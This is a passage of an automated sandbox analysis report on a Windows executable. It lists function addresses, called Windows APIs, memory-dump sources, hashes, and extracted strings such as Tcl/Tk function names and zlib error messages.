                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 485612231-0
                                                                                                                                                                                                                                        • Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                        • Instruction ID: cb992dc3656c9c44324079b869f89d8e090d5bf0edf12629a087b7d1aa4258d0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9FE0BF51E0D60292FF157BF2785597991517F94B40FB54035D91D462A1FE2CEC8DC222
                                                                                                                                                                                                                                        Function 00007FF78DA6ABC8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CloseHandle.KERNELBASE(?,?,?,00007FF78DA6AA45,?,?,00000000,00007FF78DA6AAFA), ref: 00007FF78DA6AC36
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF78DA6AA45,?,?,00000000,00007FF78DA6AAFA), ref: 00007FF78DA6AC40
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 918212764-0
                                                                                                                                                                                                                                        • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                        • Instruction ID: 11b825b06d2f4df90cfa4fabadceda2815e9f63f254cf8df35364a9b72fbfa8f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2521A711B1C64281EB9477E2B450A7E9292BF847A0FB84235D92E477C1FE6CEC4DC312
                                                                                                                                                                                                                                        Function 00007FF78DA6BF1C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                        • Instruction ID: c1059818f53ec85c8e6a1c0b8f46978a3c279a8cf73f3f8bc585a32c2e71f0f4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5241B63290D201C7EA34BBA5B540679B7A4FB55B44FB04131D68D476D1EF2DE806CB62
                                                                                                                                                                                                                                        Function 00007FF78DA57F80 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _fread_nolock
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 840049012-0
                                                                                                                                                                                                                                        • Opcode ID: 8334f334696440ef64ed4453da584d980c1c0ded1461c6629ef7e16216bca0a0
                                                                                                                                                                                                                                        • Instruction ID: 446cc64a2cccb539d2c3f9e237bed5d4a80ee52572a11b335388ea34dc261adc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8334f334696440ef64ed4453da584d980c1c0ded1461c6629ef7e16216bca0a0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE210421B0C65185FA50BAA26400BBAD660BF45BD4FFC0030EE1C47B86EE3CE849C622
                                                                                                                                                                                                                                        Function 00007FF78DA6B9AC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                                                                                                                                                        • Instruction ID: 2c39e7b62c8a66b456248d06f544c2e4d8643609d781c570979da2e3d2da2bd8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C7312C22A1C642C6E6517BA5A841A7CB650BB50F94FF10535EA6D033D2EFBCEC49C732
                                                                                                                                                                                                                                        Function 00007FF78DA699D1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3947729631-0
                                                                                                                                                                                                                                        • Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                                                        • Instruction ID: ae4fbe4126699400f074f587ad2c33b4589cc4f19af0835a33385946e8f53c77
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FD21A331A08741CAEB64AFA4D4446FC73E0FB14718FB40A35E61D16AC5EF38D849C761
                                                                                                                                                                                                                                        Function 00007FF78DA66004 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                        • Instruction ID: 2018f3d165cfbb6e75aaeb171e427196baba683e2521475bf4e14ae6ebd5d0e4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F114522A1D642C1EA617FA1B40097EE264BF45B84FF44031EB4C57A95EF7EDC44C762
                                                                                                                                                                                                                                        Function 00007FF78DA763C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                        • Instruction ID: 649fee75d137b3dae6ac3cf5ea4774374cfbc4a93a35b9dd80ecfc624af3f2ba
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B021AA7261CA4186D7619F18E440779B7A4FB84B54FB84234D69D476D5EF3CDC08CB11
                                                                                                                                                                                                                                        Function 00007FF78DA6042C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                        • Instruction ID: 999ebc8f07484b07a83fc52c905d4b3eee2c0c8223fc55abd532e99a9a53f8a9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D501A521A0C74180EA14EF93A945869E691FF85FE0FB84631DE6C17BDAEE3CD845C315
                                                                                                                                                                                                                                        Function 00007FF78DA6D66C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(?,?,?,00007FF78DA60D00,?,?,?,00007FF78DA6236A,?,?,?,?,?,00007FF78DA63B59), ref: 00007FF78DA6D6AA
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4292702814-0
                                                                                                                                                                                                                                        • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                        • Instruction ID: 8bf856e36d0fab902f34552de8ddf06b932d8ffd0053ef3b171e2e9ce2095c69
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BFF03A48F1D30284FE5477B16801E7992907F54BE0FB80230DA2E852C1FE6CEC98C132

                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                        Function 00007FF78DA576B0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                        • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                        • Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                        • Instruction ID: f17b801c66fbee25e92912b887ae592251ef3577344d60a7e9617627fd5ad745
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B029064A0DB0BD1EA15BB95E814DB5A2A1BF04755BF40035D8AE622A4FF3CBD4DC332
                                                                                                                                                                                                                                        Function 00007FF78DA7411C Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                        • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                        • Opcode ID: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
                                                                                                                                                                                                                                        • Instruction ID: 859d34c7c3b65f82cf810844ee7216cab6a946e07ea4b3a0e50617935bf3eb1c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2EB2D372B1C2828BE7649EA4D440BFDB7A1FB44788FB01135DA4D57A84EB78ED08CB51
                                                                                                                                                                                                                                        Function 00007FF78DA5AD1D Relevance: 12.0, Strings: 9, Instructions: 744COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                                        • API String ID: 0-2665694366
                                                                                                                                                                                                                                        • Opcode ID: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
                                                                                                                                                                                                                                        • Instruction ID: b3545042f8491e2ad336a503b89356b35f117bab14ae0899a5a3d5bfaac56833
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D8520472A186A68BD7A49F15C458F7E7BB9FB44341F614138E64A83780EB3CEC48CB51
                                                                                                                                                                                                                                        Function 00007FF78DA5D19C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3140674995-0
